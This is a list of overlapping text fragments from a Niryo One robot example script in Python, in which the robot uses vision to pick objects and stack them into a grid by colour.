ngram
listlengths
0
67.8k
[ "how the color line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0]", "pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at the end of", "many objects can be put on the same line before increasing the conditioning", "} # Loop until too much failures while try_without_success < 3: # Moving", "def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\":", "status or not obj_found: try_without_success += 1 continue # Choose Y position according", "Z position according to how the color line is filled offset_x = count_dict[color_val]", "be pack over the lower level \"\"\" from niryo_one_tcp_client import * # --", "Unpacking return result status, obj_found, shape, color = ret if not status or", "z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose =", "# IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used", "tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" # Robot's", "{ \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until too much", "try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get", "== \"RED\": offset_y = 0 else: offset_y = 1 # Choose X &", "# Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) #", "Change these variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One", "robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending", "= -1 elif color_val == \"RED\": offset_y = 0 else: offset_y = 1", "IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for", "X axis corresponds to how many objects can be put on the same", "objects can be put on the same line before increasing the conditioning height.", "ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape,", "= RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace", "according to the objects' color. The objects will be conditioned in a grid", "variables grid_dimension = (3, 3) # -- Should Change these variables # The", "return result status, obj_found, shape, color = ret if not status or not", "= count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05", "The objects will be conditioned in a grid of dimension grid_dimension. The Y", "to how many objects can be put on the same line before increasing", "workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can change these variables", "= color.value if color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\":", "at the end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0,", "for picking workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can change", "-- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address of the", "if not status or not obj_found: try_without_success += 1 continue # Choose Y", "Y axis corresponds to the Color : BLUE / RED / GREEN. It", "variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One tool_used =", "the color line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] //", "* # -- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address", "if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints)", "try_without_success = 0 if __name__ == '__main__': # Connect to robot client =", "will be pack over the lower level \"\"\" from niryo_one_tcp_client import * #", "grid of dimension grid_dimension. The Y axis corresponds to the Color : BLUE", "tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main", "Workspace Name # -- Can change these variables grid_dimension = (3, 3) #", "used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can", "- grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place", "of how to use Niryo One's vision to make a conditioning according to", "offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose =", "Name # -- Can change these variables grid_dimension = (3, 3) # --", "= PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the", "conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) #", "One's vision to make a conditioning according to the objects' color. The objects", "* offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val]", "\"workspace_1\" # Robot's Workspace Name # -- Can change these variables grid_dimension =", "corresponds to how many objects can be put on the same line before", "# Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client)", "== \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y = 0 else:", "Y position according to Color color_val = color.value if color_val == \"BLUE\": offset_y", "ret if not status or not obj_found: try_without_success += 1 continue # Choose", "\"RED\": offset_y = 0 else: offset_y = 1 # Choose X & Z", "status, obj_found, shape, color = ret if not status or not obj_found: try_without_success", "use Niryo One's vision to make a conditioning according to the objects' color.", "grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05", "= 0 if __name__ == '__main__': # Connect to robot client = NiryoOneClient()", "\"RED\": 0, \"GREEN\": 0, } # Loop until too much failures while try_without_success", "count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] #", "to make a conditioning according to the objects' color. The objects will be", "# -- Can change these variables grid_dimension = (3, 3) # -- Should", "color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y = 0", "observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API ret", "place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) #", "# Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name #", "objects will be pack over the lower level \"\"\" from niryo_one_tcp_client import *", "= count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0]", "objects' color. The objects will be conditioned in a grid of dimension grid_dimension.", "Choose Y position according to Color color_val = color.value if color_val == \"BLUE\":", "object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose))", "will be conditioned in a grid of dimension grid_dimension. The Y axis corresponds", "-- Can change these variables grid_dimension = (3, 3) # -- Should Change", "= ret if not status or not obj_found: try_without_success += 1 continue #", "height. Once a line is completed, objects will be pack over the lower", "color.value if color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y", "of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # --", "conditioning height. Once a line is completed, objects will be pack over the", "filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val]", "1 continue # Choose Y position according to Color color_val = color.value if", "This script shows an example of how to use Niryo One's vision to", "continue # Choose Y position according to Color color_val = color.value if color_val", "* offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success", "be conditioned in a grid of dimension grid_dimension. The Y axis corresponds to", "until too much failures while try_without_success < 3: # Moving to observation pose", "count count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__': # Connect", "# Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0.,", "in a grid of dimension grid_dimension. The Y axis corresponds to the Color", "x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area", "\"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until too much failures", "from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return", "PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning", "0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = {", "pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API ret =", "or not obj_found: try_without_success += 1 continue # Choose Y position according to", "its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN", "robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One tool_used = RobotTool.GRIPPER_1", "color line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2", "Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One", "dimension grid_dimension. The Y axis corresponds to the Color : BLUE / RED", "to how the color line is filled offset_x = count_dict[color_val] % grid_dimension[0] -", "One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status,", "0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1", "while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to", "if color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y =", "# Unpacking return result status, obj_found, shape, color = ret if not status", "& Z position according to how the color line is filled offset_x =", "the lower level \"\"\" from niryo_one_tcp_client import * # -- MUST Change these", "# -- Should Change these variables # The pose from where the image", "BLUE / RED / GREEN. It will be 3 The X axis corresponds", "line is completed, objects will be pack over the lower level \"\"\" from", "will be 3 The X axis corresponds to how many objects can be", "grid_dimension = (3, 3) # -- Should Change these variables # The pose", "process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0,", "client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) # Releasing connection", "0, \"GREEN\": 0, } # Loop until too much failures while try_without_success <", "much failures while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) #", "__name__ == '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing", "Change these variables # The pose from where the image processing happen observation_pose", "API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found,", "color=Color.ANY) # Unpacking return result status, obj_found, shape, color = ret if not", "Choose X & Z position according to how the color line is filled", "elif color_val == \"RED\": offset_y = 0 else: offset_y = 1 # Choose", "else: offset_y = 1 # Choose X & Z position according to how", "over the lower level \"\"\" from niryo_one_tcp_client import * # -- MUST Change", "conditioned in a grid of dimension grid_dimension. The Y axis corresponds to the", "The Y axis corresponds to the Color : BLUE / RED / GREEN.", "from niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address = \"192.168.1.202\"", "a conditioning according to the objects' color. The objects will be conditioned in", "count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until", "== '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool", "to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025", "to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot", "GREEN. It will be 3 The X axis corresponds to how many objects", "before increasing the conditioning height. Once a line is completed, objects will be", "# Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) # Releasing connection client.quit()", "Color color_val = color.value if color_val == \"BLUE\": offset_y = -1 elif color_val", "PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0,", "these variables grid_dimension = (3, 3) # -- Should Change these variables #", "grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to", "0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0", "to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API", "\"192.168.1.202\" # IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool", "/ GREEN. It will be 3 The X axis corresponds to how many", "of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57", "# -- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address of", "result status, obj_found, shape, color = ret if not status or not obj_found:", "1 # Choose X & Z position according to how the color line", "a grid of dimension grid_dimension. The Y axis corresponds to the Color :", "the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 )", "Can change these variables grid_dimension = (3, 3) # -- Should Change these", "shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color = ret if", "lower level \"\"\" from niryo_one_tcp_client import * # -- MUST Change these variables", "3 The X axis corresponds to how many objects can be put on", "client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process", "count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 *", "z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at the", "\"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y = 0 else: offset_y", "Robot's Workspace Name # -- Can change these variables grid_dimension = (3, 3)", "< 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object", "Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate", "the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z)", "position according to how the color line is filled offset_x = count_dict[color_val] %", "# Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) #", "end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] #", "the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0,", "niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name,", "= [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client):", "X & Z position according to how the color line is filled offset_x", "Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y,", "the objects' color. The objects will be conditioned in a grid of dimension", "axis corresponds to the Color : BLUE / RED / GREEN. It will", "/ RED / GREEN. It will be 3 The X axis corresponds to", "The pose from where the image processing happen observation_pose = PoseObject( x=0.20, y=0.,", "too much failures while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list())", "robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if", "on the same line before increasing the conditioning height. Once a line is", "niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address = \"192.168.1.202\" #", "pose from where the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3,", "= { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until too", "the Color : BLUE / RED / GREEN. It will be 3 The", "these variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One tool_used", "niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color =", "0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success =", "failures while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying", "pack over the lower level \"\"\" from niryo_one_tcp_client import * # -- MUST", "// 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the object", "make a conditioning according to the objects' color. The objects will be conditioned", "how many objects can be put on the same line before increasing the", "Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name # --", "can be put on the same line before increasing the conditioning height. Once", "'__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used)", "0 else: offset_y = 1 # Choose X & Z position according to", "# Robot's Workspace Name # -- Can change these variables grid_dimension = (3,", "+= 1 continue # Choose Y position according to Color color_val = color.value", "offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] //", "offset_y = 1 # Choose X & Z position according to how the", "a line is completed, objects will be pack over the lower level \"\"\"", "shows an example of how to use Niryo One's vision to make a", "# Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo", "x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes", "if __name__ == '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) #", "0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict =", "the end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0]", "0, \"RED\": 0, \"GREEN\": 0, } # Loop until too much failures while", "Trying to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY,", "(3, 3) # -- Should Change these variables # The pose from where", "Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) #", "vision to make a conditioning according to the objects' color. The objects will", "# Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__':", "= 1 # Choose X & Z position according to how the color", "according to how the color line is filled offset_x = count_dict[color_val] % grid_dimension[0]", "= (3, 3) # -- Should Change these variables # The pose from", "1 try_without_success = 0 if __name__ == '__main__': # Connect to robot client", "grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the", "is completed, objects will be pack over the lower level \"\"\" from niryo_one_tcp_client", "be 3 The X axis corresponds to how many objects can be put", "completed, objects will be pack over the lower level \"\"\" from niryo_one_tcp_client import", "0 if __name__ == '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address)", "yaw=0.0, ) # Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25,", "= PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the", "client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO)", "the same line before increasing the conditioning height. Once a line is completed,", "# Trying to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0,", "not status or not obj_found: try_without_success += 1 continue # Choose Y position", "Color : BLUE / RED / GREEN. It will be 3 The X", "y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose", "Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57,", "the conditioning height. Once a line is completed, objects will be pack over", "processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) #", "RED / GREEN. It will be 3 The X axis corresponds to how", "picking workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can change these", "# Choose Y position according to Color color_val = color.value if color_val ==", "\"\"\" This script shows an example of how to use Niryo One's vision", "the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name =", "yaw=-1.57 ) # Joints where the robot goes at the end of its", "roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose = PoseObject(", "= center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment", "-- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0,", "NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration", "[0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success", "3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from", "axis corresponds to how many objects can be put on the same line", "place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 *", "to the objects' color. The objects will be conditioned in a grid of", ") # Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12,", "% grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going", "niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__ ==", "Once a line is completed, objects will be pack over the lower level", "0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict", "center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where", "example of how to use Niryo One's vision to make a conditioning according", "robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True)", "address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking", "observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of", "// grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x,", "goes at the end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0,", "needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) #", "3) # -- Should Change these variables # The pose from where the", "= \"workspace_1\" # Robot's Workspace Name # -- Can change these variables grid_dimension", "One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" #", "# Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 *", "shape, color = ret if not status or not obj_found: try_without_success += 1", "-1 elif color_val == \"RED\": offset_y = 0 else: offset_y = 1 #", "color_val = color.value if color_val == \"BLUE\": offset_y = -1 elif color_val ==", "The X axis corresponds to how many objects can be put on the", "= \"192.168.1.202\" # IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 #", "conditioning according to the objects' color. The objects will be conditioned in a", "Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__': #", "-- Should Change these variables # The pose from where the image processing", "where the robot goes at the end of its process sleep_joints = [0.0,", "obj_found: try_without_success += 1 continue # Choose Y position according to Color color_val", "happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center", "offset_y = 0 else: offset_y = 1 # Choose X & Z position", "Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result", "get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) #", "offset_y = -1 elif color_val == \"RED\": offset_y = 0 else: offset_y =", "from where the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0,", "these variables # The pose from where the image processing happen observation_pose =", "# -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\":", "It will be 3 The X axis corresponds to how many objects can", "color_val == \"RED\": offset_y = 0 else: offset_y = 1 # Choose X", "# Choose X & Z position according to how the color line is", "y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at", "center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count", "MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\":", "offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] +=", "script shows an example of how to use Niryo One's vision to make", "MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo", "Loop until too much failures while try_without_success < 3: # Moving to observation", "objects will be conditioned in a grid of dimension grid_dimension. The Y axis", "<filename>ros/niryo_one_ros/niryo_one_tcp_server/clients/python/examples/vision_demonstrators/2_multiple_reference_conditioning.py \"\"\" This script shows an example of how to use Niryo One's", "# Loop until too much failures while try_without_success < 3: # Moving to", "= 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } #", "an example of how to use Niryo One's vision to make a conditioning", "Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching", "client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot", "# Joints where the robot goes at the end of its process sleep_joints", "variables # The pose from where the image processing happen observation_pose = PoseObject(", "Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\"", "-1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0", "corresponds to the Color : BLUE / RED / GREEN. It will be", "grid_dimension. The Y axis corresponds to the Color : BLUE / RED /", "= NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs", "put on the same line before increasing the conditioning height. Once a line", "process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM", "obj_found, shape, color = ret if not status or not obj_found: try_without_success +=", "be put on the same line before increasing the conditioning height. Once a", "\"GREEN\": 0, } # Loop until too much failures while try_without_success < 3:", "count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__': # Connect to", "to use Niryo One's vision to make a conditioning according to the objects'", "PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot", "Niryo One's vision to make a conditioning according to the objects' color. The", "* offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0 if", "\"\"\" from niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address =", "+= 1 try_without_success = 0 if __name__ == '__main__': # Connect to robot", "= niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color", "RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name", "sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def", "Joints where the robot goes at the end of its process sleep_joints =", "increasing the conditioning height. Once a line is completed, objects will be pack", "line before increasing the conditioning height. Once a line is completed, objects will", "roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at the end", ") # Joints where the robot goes at the end of its process", "calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) # Releasing", "same line before increasing the conditioning height. Once a line is completed, objects", "2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose", "area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints", "of dimension grid_dimension. The Y axis corresponds to the Color : BLUE /", "color. The objects will be conditioned in a grid of dimension grid_dimension. The", "image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, )", "to the Color : BLUE / RED / GREEN. It will be 3", "try_without_success += 1 continue # Choose Y position according to Color color_val =", "to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY)", "change these variables grid_dimension = (3, 3) # -- Should Change these variables", "of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name", "position according to Color color_val = color.value if color_val == \"BLUE\": offset_y =", "offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__", "pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0,", "not obj_found: try_without_success += 1 continue # Choose Y position according to Color", "according to Color color_val = color.value if color_val == \"BLUE\": offset_y = -1", "the robot goes at the end of its process sleep_joints = [0.0, 0.55,", "# The pose from where the image processing happen observation_pose = PoseObject( x=0.20,", "Should Change these variables # The pose from where the image processing happen", "where the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57,", ": BLUE / RED / GREEN. It will be 3 The X axis", "offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success =", "level \"\"\" from niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address", "import * # -- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP", "how to use Niryo One's vision to make a conditioning according to the", "0, } # Loop until too much failures while try_without_success < 3: #", "is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z =", "object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking", "to Color color_val = color.value if color_val == \"BLUE\": offset_y = -1 elif", "line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z", "try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, }", "height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color = ret", "= 0 else: offset_y = 1 # Choose X & Z position according", "color = ret if not status or not obj_found: try_without_success += 1 